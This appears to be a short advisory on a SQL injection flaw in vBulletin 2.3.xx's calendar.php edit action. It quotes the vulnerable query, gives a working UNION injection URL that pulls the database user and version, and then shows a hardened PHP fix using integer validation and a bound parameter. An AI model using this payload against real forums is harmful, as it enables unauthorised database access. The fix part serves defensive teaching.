——– Cut from line 585 in calendar.php ——–
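else if ($action == "edit")
{
    // $eventid is taken from the request and interpolated into the SQL
    // unquoted and unvalidated, which is the injection point.
    $eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
    eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");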
—————————————————–
If the MySQL version is greater than 4.00, a UNION attack could be used.
—————————————–
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
—————————————–
The query_first function returns only the first row of the query result, so make sure it returns the one you want.
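
The root cause in the excerpt is that $eventid reaches the SELECT unquoted and unvalidated. The hardened lookup below is an added example, not vBulletin's own code or its patch: it assumes PDO with an in-memory SQLite database standing in for $DB_site, and the function name fetch_event and the sample rows are constructed for illustration.

```php
<?php
// Added example: hardened lookup for the calendar "edit" branch.
// Constructed schema and rows; PDO/SQLite stands in for vBulletin's $DB_site.

function fetch_event(PDO $db, $rawEventId): ?array
{
    // 1. Allow-list: eventid must be a positive integer and nothing else.
    $eventid = filter_var($rawEventId, FILTER_VALIDATE_INT,
                          ['options' => ['min_range' => 1]]);
    if ($eventid === false) {
        return null; // "12 union (SELECT ...)" is rejected before any SQL runs
    }

    // 2. Bound parameter: the value is never concatenated into the statement.
    $stmt = $db->prepare(
        'SELECT allowsmilies, public, userid, eventdate, event, subject
           FROM calendar_events WHERE eventid = :eventid'
    );
    $stmt->bindValue(':eventid', $eventid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE calendar_events (eventid INTEGER PRIMARY KEY,
    allowsmilies INTEGER, public INTEGER, userid INTEGER,
    eventdate TEXT, event TEXT, subject TEXT)');
$db->exec("INSERT INTO calendar_events VALUES
    (12, 1, 1, 7, '2003-05-01', 'Release party', 'v2.3'),
    (13, 1, 0, 9, '2003-06-01', 'Private note', 'internal')");

// Constructed inputs: a legitimate id and the decoded eventid value from the URL above.
$inputs = [
    '12',
    "12 union (SELECT allowsmilies,public,userid,'0000-0-0',user(),version() "
    . "FROM calendar_events WHERE eventid = 13) order by eventdate",
];
foreach ($inputs as $in) {
    $row = fetch_event($db, $in);
    printf("%-20.20s => %s\n", $in, $row ? $row['subject'] : 'rejected');
}
```

Either control alone stops the UNION payload; using both keeps the query safe if the validation is later loosened or the value is reused in another statement.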
The above is the full content of vBulletin Forum 2.3.xx SQL Injection.